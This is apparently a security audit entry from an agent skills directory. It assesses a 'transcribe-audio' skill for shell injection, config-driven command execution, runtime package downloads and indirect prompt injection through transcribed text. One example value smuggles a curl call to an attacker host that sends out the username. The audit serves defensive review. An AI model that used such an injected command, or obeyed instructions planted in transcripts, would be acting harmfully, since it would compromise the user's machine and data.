The Agent Skills Directory

[COMMAND_EXECUTION]: The script scripts/transcribe.py executes shell commands using subprocess.run(cmd, shell=True). While the script attempts to sanitize inputs using shlex.quote() for the input path and output directory, the format variable is interpolated into the command string without any quoting or validation. This allows an attacker or a malicious configuration to inject arbitrary shell commands through the format parameter (e.g., providing a format like txt; curl http://attacker.com/$(whoami)).
[REMOTE_CODE_EXECUTION]: The skill's operation model involves reading a shell command template from a local JSON configuration file (~/.config/transcribe-audio/config.json) and executing it. This design pattern grants the skill the ability to execute arbitrary commands defined in the configuration, which could be exploited if the configuration file is tampered with.
[EXTERNAL_DOWNLOADS]: The setup instructions in references/setup.md recommend using uvx to run transcription models such as mlx-whisper, parakeet-mlx, and whisper-ctranslate2. These commands download and execute code from the Python Package Index (PyPI) at runtime. While these are established tools in the machine learning community, the process involves executing code from an external repository.
[PROMPT_INJECTION]: The skill involves processing transcribed text which may contain indirect prompt injections designed to influence the agent during the 'error fixing' or 'structuring' phases. The skill includes some mitigation by instructing the agent to flag issues for human review rather than performing silent corrections, which reduces but does not eliminate the risk.

transcribe-audio